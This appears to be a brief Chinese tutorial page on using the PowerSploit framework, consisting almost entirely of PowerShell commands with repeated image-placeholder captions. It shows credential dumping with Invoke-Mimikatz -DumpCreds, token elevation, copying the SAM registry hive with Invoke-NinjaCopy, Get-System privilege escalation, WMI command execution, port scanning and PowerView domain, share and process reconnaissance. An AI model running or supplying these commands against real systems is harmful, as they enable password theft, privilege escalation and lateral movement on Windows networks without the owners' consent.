天天看點

PowerSploit的使用

Invoke-Mimikatz(依賴管理者)

Import-Module .\invoke-mimikatz.ps1
Invoke-Mimikatz –DumpCreds
           
PowerSploit的使用

使用Invoke-Mimikatz –command “mimikatz指令”來執行指令:

Invoke-Mimikatz –command "token::elevate"
           
PowerSploit的使用

Invoke-Ninjacopy (依賴管理者)

直接拷貝系統檔案:

PowerSploit的使用
Import-Module .\invoke-ninjacopy.ps1
invoke-ninjacopy -Path C:\Windows\System32\config\SAM -LocalDestination C:\Users\administrator\Desktop\SAM
           
PowerSploit的使用

Get-System (依賴管理者)

Import-Module .\Get-System 
get-system
           
PowerSploit的使用

Invoke-Portscan

掃描Top50端口:

Invoke-Portscan –Hosts ip位址 –TopPorts 50
           
PowerSploit的使用

掃描特定端口:

Invoke-Portscan –Hosts ip位址 –Ports 端口
           
PowerSploit的使用

Invoke-ReverseDnsLookup

反向解析IP位址:

Import-Module .\Invoke-ReverseDnsLookup.ps1
Invoke-ReverseDnsLookup 192.168.91.131
           
PowerSploit的使用

Invoke-Wmicommand

Import-Module .\Invoke-Wmicommand.ps1
Invoke-Wmicommand -Payload {whoami}
           
PowerSploit的使用

Get-NetDomain

Import-Module .\PowerView.ps1
Get-NetDomain
           
PowerSploit的使用

Get-NetDomainController

get-NetDomainController
           
PowerSploit的使用
Invoke-ProcessHunter –ProcessName 程序名
Invoke-ProcessHunter –ProcessName powershell
           
PowerSploit的使用

Get-NetShare擷取共享資訊

get-netshare
           
PowerSploit的使用

繼續閱讀